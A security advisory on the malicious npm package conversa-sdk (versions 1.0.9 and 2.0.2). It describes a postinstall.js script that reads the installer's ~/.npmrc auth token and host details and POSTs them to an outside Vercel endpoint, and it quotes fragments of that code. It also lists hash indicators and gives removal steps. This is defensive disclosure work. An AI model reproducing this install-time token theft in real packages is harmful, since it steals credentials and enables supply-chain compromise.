Malicious package

conversa-sdk (npm)

Malicious code in conversa-sdk (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6185
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall conversa-sdk

What this malware does

On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate.

The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc, ... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })).

The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.

Malicious versions

2 flagged:

  • 1.0.9
  • 2.0.2

Indicators of compromise (SHA-256)

9eb25af4493d35dea152523e50bcb419ce6e6147ba1725d8d5d15d20ff2a77a6
baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0

Frequently asked questions

No. conversa-sdk on npm has been identified as a malicious package (versions 1.0.9, 2.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

  • IN-MAL-2026-007051
  • IN-MAL-2026-007050

Credits

  • Amazon Inspector · finder

conversa-sdk (npm) malicious package — MAL-2026-6185 | O3 Security